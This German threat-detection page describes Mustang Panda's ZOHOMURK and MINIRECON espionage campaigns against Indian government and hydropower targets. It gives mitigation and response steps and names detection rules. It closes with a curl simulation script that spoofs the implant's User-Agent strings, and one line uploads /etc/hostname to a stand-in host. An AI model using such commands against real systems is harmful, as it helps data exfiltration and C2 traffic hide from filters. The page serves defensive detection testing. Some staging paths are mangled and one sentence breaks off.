Mustang Panda setzt ZOHOMURK und MINIRECON gegen Indiens Regierungs- und Energiesektor ein
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Mustang Panda führt Spionageoperationen durch, die auf die indische Regierung und den Wasserkraftsektor abzielen. Die Gruppe verwendet ein aktualisiertes Malware-Toolkit, das SHARDLOADER, MINIRECON und ZOHOMURK umfasst. Eine ihrer bemerkenswerten Techniken ist der Missbrauch von Zoho WorkDrive für Command-and-Control und Datenexfiltration.
Untersuchung
Acronis TRU identifizierte zwei parallele Kampagnen, die Spear-Phishing-Köder in Bezug auf die Indien-Taiwan-Kooperation verwendeten. Forscher fanden DLL-Sideloading durch legitime Solid PDF Creator-Binärdateien und analysierten die neuen ZOHOMURK- und MINIRECON-Implantate. Die Untersuchung wurde auch in Zusammenarbeit mit CERT-In durchgeführt, um defensive Maßnahmen zu unterstützen.
Minderung
Organisationen sollten ungewöhnliche Aktivitäten mit Cloud-Plattformen überwachen, insbesondere die unautorisierte Nutzung von Zoho WorkDrive. EDR- und XDR-Lösungen sollten konfiguriert werden, um DLL-Sideloading und verdächtige Registry-basierte Persistenz zu erkennen. Einblick in Nicht-Browser-Prozesse, die HTTPS- oder WebSocket-Verbindungen zu Cloud-Diensten herstellen, ist ebenfalls essentiell.
Reaktion
Wird diese Aktivität festgestellt, sollten betroffene Systeme sofort isoliert werden, um weitere Exfiltration durch Cloud-APIs zu stoppen. Ermittler sollten eine forensische Analyse der Staging-Pfade wie C:ProgramDataIDMlogs or %LOCALAPPDATA%MicrosoftVaultCache. Registry-Run-Schlüssel und geplante Aufgaben sollten ebenfalls auf unautorisierte Persistenz überprüft werden.
Angriffsfluss
Erkennungen
Verdächtige geplante Aufgabe (über Audit)
Ansicht
Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (über registry_event)
Ansicht
Verdächtige Dateien im öffentlichen Benutzerprofil (über file_event)
Ansicht
Erkennung der Mustang Panda MINIRECON und ZOHOMURK C2-Kommunikation [Windows-Netzwerkverbindung]
Ansicht
Mustang Panda ZOHOMURK Command-and-Control-Erkennung [Proxy]
Ansicht
Erkennung von Mustang Panda-Persistenzmechanismen in Angriffen auf den indischen Sektor [Windows Registry Event]
Ansicht
Simulation Ausführung
Voraussetzung: Der Telemetrie- & Base Line Pre-Flight Check muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die darauf ausgelegt ist, die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die von der Erkennungslogik erwartete genaue Telemetrie zu generieren. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle: Der Gegner hat erfolgreich einen Fuß gefasst und versucht, Command-and-Control (C2)-Kommunikation einzuleiten. Um sich als legitimen Geschäftsdatenverkehr zu tarnen, versucht das ZOHOMURK-Implantat, mit seinem Controller zu kommunizieren, indem es Zoho WorkDrive-API-Aufrufe imitiert. Der Angreifer verwendet eine spezifische, hartkodierte User-Agent-Zeichenkette (
Zoho Client/1.0), um bestimmte Netzfilter zu passieren und hofft, sich in legitimen Cloud-Produktivitätsdatenverkehr einzufügen. Diese Aktion wird einen Proxy-Logeintrag mit dem Ziel-User-Agent erzeugen, wodurch die Erkennungsregel ausgelöst wird. -
Regressionstestskript:
#!/bin/bash # Simulation von ZOHOMURK C2 über User-Agent-Spoofing # Ziel 1: Imitation von Zoho Client echo "[+] Simulation von ZOHOMURK: Zoho Client/1.0" curl -A "Zoho Client/1.0" http://example.com/api/v1/sync # Ziel 2: Imitation von IPFetcher echo "[+] Simulation von ZOHOMURK: IPFetcher/1.0" curl -A "IPFetcher/1.0" http://example.com/checkip # Ziel 3: Imitation von Multipart POST User-Agent echo "[+] Simulation von ZOHOMURK: Multipart POST" curl -X POST -A "Multipart POST" -F "data=@/etc/hostname" http://example.com/upload -
Bereinigungskommandos:
# Durch diese netzwerkbasierte Simulation werden keine persistenten Artefakte auf dem System erstellt. # Stellen Sie einfach sicher, dass keine Hintergrund-curl-Prozesse laufen. pkill curl